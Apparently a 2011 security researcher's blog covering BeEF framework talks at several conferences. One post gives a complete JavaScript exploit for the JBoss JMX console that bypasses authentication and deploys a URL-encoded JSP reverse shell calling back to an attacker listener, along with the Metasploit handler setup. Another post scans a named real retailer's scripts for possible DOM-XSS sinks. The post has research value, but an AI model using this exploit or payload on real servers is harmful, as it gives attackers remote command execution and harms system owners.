Meet BeEF at DeepSec 2011
euronymous — 11 October, 2011 - 09:14
After a couple of months of blog hibernation, I'm here again to write my thoughts.
Last months have been pretty busy on conferences, work and BeEF development.
I was speaking at SecurityByte 2011 (Bangalore, India) having a lot of fun with Nish Bhalla, Ashim (NullCon organizer),
the guys from ClubHack, my colleague Lava @lavakumark, Krzystof @kkotowicz, and the russian friends Alexander @sh2kerr and Dmitriy @evdokimovds. The food was great (chicken curry, very hot and spicy) and the venue was fantastic.
After a couple of weeks I was invited to speak at Hacktivity 2011 (Budapest, Hungary). The fun was assured thanks to my friends Raoul Chiesa, Mate Soos, FluxFelix @flxflx and the crew from CONFidence that come from Warsaw to party with us. My talk has been followed by many many people, in the main room, so I was definitely happy :-)
This year schedule for conferences has been quite tight, with the fourth conference as a speaker in 1 month.
17-18 November DeepSec 2011 will be held in Vienna, Austria. DeepSec is one of the largest security conferences in Europe and it's famous for the usual high quality of the talks. Trainings are usually very good too. Pity that this year Saumil Shah training on Low-level exploitation will not be present (but let hope for next year).
As usual, the cool DeepSec crew write a blog entry for every talk, to give more information to the attendees and explain the cryptic abstracts of the talks in a human-readable way.
As you can read here in the DeepSec blog, I will speak about BeEF (yet another time :)
covering the latest development we're are doing on Chrome Extensions exploitation, Internal Network Fingerprinting and Exploitation, as well as a little preview of LAMBs (yep, as you can see we love animal acronyms :). Let think about them like bots/drones deployed by BeEF in the internal network that will communicate back with the BeEF framework. I know that the info is now pretty abstract, but lets keep the good work for DeepSec :-)
My BeEF talk at CONFidence 2011
euronymous — 30 May, 2011 - 12:24
I'm back from CONFidence 2011 and PH-Neutral: I've enjoyed these hacking and alchool events a lot.
Guys from CONFidence have worked really hard to organize the conference, and everything went in the right way:
we speakers have been picked up in airport/train station by CONFidence crew and enjoyed the free speaker dinners,
free speaker alchool and other things :-)
Here below the slides and the screencast demo of my talk about BeEF: thanks to every attendee (especially Mario @0x6D6172696F Heiderich - again your book is fantastic, thanks from Mr. BeEF :) - and Krzysztof @kkotowicz Kotowicz that were in the first row and suggested new features/improvements).
Jboss 6.0.0M1 JMX Deploy Exploit: the BeEF way... from Michele "antisnatchor" Orru' on Vimeo.
Looking forward for the next CONFidence...
JBoss JMX Deploy Exploit
euronymous — 4 May, 2011 - 16:12
It's working pretty nice, and bypass authentication via HEAD request.
I've also added it to BeEF, take a look at it here: http://code.google.com/p/beef/source/detail?r=951
Before launching it, both this or the BeEF version, remember to fire your Metasploit multi/handler:
msf > use exploit/multi/handler msf exploit(handler) > set payload java/jsp_shell_reverse_tcp payload => java/jsp_shell_reverse_tcp msf exploit(handler) > set lhost 192.168.1.2 lhost => 192.168.1.2 msf exploit(handler) > set lport 6666 lport => 6666 msf exploit(handler) > exploit [*] Started reverse handler on 192.168.1.2:6666 [*] Starting the payload handler...
Here is the plain Javascript version, using jQuery to issue XHRs:
<html>
<head>
<script src="./jquery-1.5.2.min.js" type="text/javascript"> </script>
</head>
<body>
<h1>Jboss 6.0.0M1 JMX Deploy Exploit</h1>
<br>author: Michele "antisnatchor" Orru'
<!--
* Jboss 6.0.0M1 JMX Upload Exploit
* Should also work on Jboss 5.1.0 and 4.x versions
*
* Ported from l33tb0y Ruby code in Javascript by antisnatchor.
* HEAD request with malicious JSP -> sleep 10 secs -> GET request to deployed JSP -> reverse connection to listening MSF handler
*
* Please note that this is a variation of the JBOSS exploits of Metasploit: instead of deploying a WAR, directly deploy a JSP reverse shell
-->
<div class="output"> </div>
<script type="text/javascript">
function randomString(len, charSet) {
charSet = charSet || 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789';
var randomString = '';
for (var i = 0; i < len; i++) {
var randomPoz = Math.floor(Math.random() * charSet.length);
randomString += charSet.substring(randomPoz,randomPoz+1);
}
return randomString;
}
// Metasploit multi/hanlder listener
var rhost = "127.0.0.1"; //target host
var rport = "8080"; //target port
var lhost = "192.168.1.2"; //MSF handler listener host
var lport = "6666"; //MSF handler listener port
var command = "cmd.exe"; // command to be executed by Runtime.getRuntime().exec()
//Runtime.getRuntime().exec() --> with cmd.exe
var payload = "%3C%25@page%20import=%22java.lang.*%22%25%3E%20%3C%25@page%20import=%22java.util.*%22%25%3E%20%3C%25@page%20import=%22java.io.*%22%25%3E%20%3C%25@page%20import=%22java.net.*%22%25%3E%20%3C%25%20class%20StreamConnector%20extends%20Thread%20%7B%20InputStream%20is;%20OutputStream%20os;%20StreamConnector(%20InputStream%20is,%20OutputStream%20os%20)%20%7B%20this.is%20=%20is;%20this.os%20=%20os;%20%7D%20public%20void%20run()%20%7B%20BufferedReader%20in%20%20=%20null;%20BufferedWriter%20out%20=%20null;%20try%20%7B%20in%20%20=%20new%20BufferedReader(%20new%20InputStreamReader(%20this.is%20)%20);%20out%20=%20new%20BufferedWriter(%20new%20OutputStreamWriter(%20this.os%20)%20);%20char%20buffer[]%20=%20new%20char[8192];%20int%20length;%20while(%20(%20length%20=%20in.read(%20buffer,%200,%20buffer.length%20)%20)%20%3E%200%20)%20%7B%20out.write(%20buffer,%200,%20length%20);%20out.flush();%20%7D%20%7D%20catch(%20Exception%20e%20)%7B%7D%20try%20%7B%20if(%20in%20!=%20null%20)%20in.close();%20if(%20out%20!=%20null%20)%20out.close();%20%7D%20catch(%20Exception%20e%20)%7B%7D%20%7D%20%7D%20try%20%7B%20Socket%20socket%20=%20new%20Socket(%20%22" + lhost + "%22,%20" + lport + "%20);%20Process%20process%20=%20Runtime.getRuntime().exec(%20%22" + command + "%22%20);%20(%20new%20StreamConnector(%20process.getInputStream(),%20socket.getOutputStream()%20)%20).start();%20(%20new%20StreamConnector(%20socket.getInputStream(),%20process.getOutputStream()%20)%20).start();%20%7D%20catch(%20Exception%20e%20)%20%7B%7D%20%25%3E";
var randomJspName = randomString(10);
var uri = "/jmx-console/HtmlAdaptor;index.jsp?" + "action=invokeOp&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodIndex=5&arg0=%2Fconsole-mgr.sar/web-console.war%2F&arg1=" + randomJspName + "&arg2=.jsp&arg3=" + payload + "&arg4=True";
$('.output').html("<br>[+] Sending HEAD request sent to Jboss<br>");
$.ajax({
type: 'HEAD',
url: 'http://' + rhost + ':' + rport + uri,
dataType: 'script',
success: function(data, textStatus, xhr){
$('.output').append("<br>[+] Now Sleeping for 10 secs before activating the reverse payload <br>");
function triggerReverseConn(){
$('.output').append("<br>[+] Sending GET request to [http://" + rhost + ":" + rport + "/web-console/" + randomJspName + ".jsp" + " <br>");
$.ajax({
type: 'GET',
url: 'http://' + rhost + ':' + rport +"/web-console/" + randomJspName + ".jsp",
dataType: 'script',
success: function(data, textStatus, xhr){
$('.output').append("<br>[+] OK: Reverse JSP shell should have been triggered. Check your MSF handler listener. <br>");
},
error: function(jqXHR, textStatus, errorThrown){
$('.output').append("<br>[+] ERROR: second GET request failed. <br>");
}
});
}
//sleep 10 secs
setTimeout(triggerReverseConn,10000);
},
error: function(jqXHR, textStatus, errorThrown){
$('.output').append("<br>[+] ERROR: first HEAD request failed.");
}
});
</script>
</body>
</html>
Enumerate potential DOM-based XSS vulnerable code
euronymous — 28 April, 2011 - 10:01
The output needs manual verification, but at least it's something.
Thanks .mario and Stefano for your research on the topic. And thanks Michal for the "bugfix" regarding regex :-)
# Given a set of JS/HTML/whatever files it search for potential DOM-based XSS
# injection points based on regular expressions from https://code.google.com/p/domxsswiki/wiki/FindingDOMXSS
#
# author: Michele "antisnatchor" Orru' (regex credit goes to Mario ".mario" Heiderich)
# v. 0.1
require "net/http"
require "net/https"
require "uri"
require "erb"
require "singleton"
require "rubygems"
MAIN_URL = 'http://compraonline.mediaworld.it'
MAIN_DOMAIN = 'compraonline.mediaworld.it'
PORT = 80
HTTP_PROXY_HOST = '172.31.229.10'
HTTP_PROXY_PORT = 8888
PATHS_TO_TEST = ['/resources/script/new_hp.js',
'/resources/script/commonTop.js',
'/resources/script/scripter.js'
]
puts "[+] starting requests to #{MAIN_URL}"
Net::HTTP::Proxy(HTTP_PROXY_HOST, HTTP_PROXY_PORT).start(MAIN_DOMAIN) {|http|
PATHS_TO_TEST.each{|path|
url = URI.parse(MAIN_URL + ':' + PORT.to_s + path)
req = Net::HTTP::Get.new(url.path)
http.request(req) do |res|
line = 1
response = res.body.to_s.split("\n")
response.each{|i|
# apply DOM-based xss regex to each HTTP response line, printing out lineNumber and lineContent
# that would potentially be vulnerable to DOM-based XSS (NEED MANUAL VERIFICATION!)
if(i.scan(/((src|href|data|location|code|value|action)\s*["'\]]*\s*\+?\s*=)|((replace|assign|navigate|getResponseHeader|open(Dialog)?|showModalDialog|eval|evaluate|execCommand|execScript|setTimeout|setInterval)\s*["'\]]*\s*\()/).size > 0 ||
i.scan(/(location\s*[\[.])|([.\[]\s*["']?\s*(arguments|dialogArguments|innerHTML|write(ln)?|open(Dialog)?|showModalDialog|cookie|URL|documentURI|baseURI|referrer|name|opener|parent|top|content|self|frames)\W)|(localStorage|sessionStorage|Database)/).size > 0)
puts "[#{path}]-#{line}: #{i}"
end
line += 1
}
end
}
}
A sample of the output is the following:
[/resources/script/commonTop.js]-104: top.location.href = apUrl;
[/resources/script/commonTop.js]-108: top.location.href = url;
[/resources/script/commonTop.js]-113: document.location.href = "http://" + server + "/webapp/wcs/stores/servlet/ListOrdersView?" +apDefUrl;
[/resources/script/commonTop.js]-117: top.location.href = "http://" + server + "/webapp/wcs/stores/servlet/BrandsView?" + apDefUrl;
[/resources/script/commonTop.js]-124: document.cookie = name + "=" + "; expires=Thu, 01-Jan-70 00:00:01 GMT";
[/resources/script/commonTop.js]-125: top.location.href = "http://" + serverMobi;
[/resources/script/commonTop.js]-127: top.location.href = "http://" + server + "/webapp/wcs/stores/servlet/PartnerVisit?onlyInsert
=Y&partnerId=7990000000000006500&storeId=20000&bannerId=home_mwcol&url=compraonline.mediaworld.it/html/LINKPROMO.html?content=/offerte/mobi/sez1.html";
[/resources/script/commonTop.js]-132: document.location.href = "http://" + server + "/webapp/wcs/stores/servlet/ContactUsView?storeId=20000";
[/resources/script/commonTop.js]-136: formObj.searchString.value = formObj.searchString.value.replace(/%/g,"");
[/resources/script/commonTop.js]-138: if( formObj.searchString.value.replace(/^\s+|\s+$/g,"").length < 2 )
[/resources/script/commonTop.js]-149: formObj.categoryId.value = document.getElementById('catGroupId').options[document.getElement
ById('catGroupId').selectedIndex].value;
[/resources/script/commonTop.js]-156: window.open("http://" + server +"/webapp/wcs/stores/servlet/NewsletterView?" + apDefUrl,"newsletter"
,"width=440,height=354,scrollbars=no,resizable=no");
[/resources/script/scripter.js]-75: this.layer.document.writeln(body[i]);
[/resources/script/scripter.js]-82: this.element.innerHTML = body;
[/resources/script/scripter.js]-88: this.element.innerHTML = body;
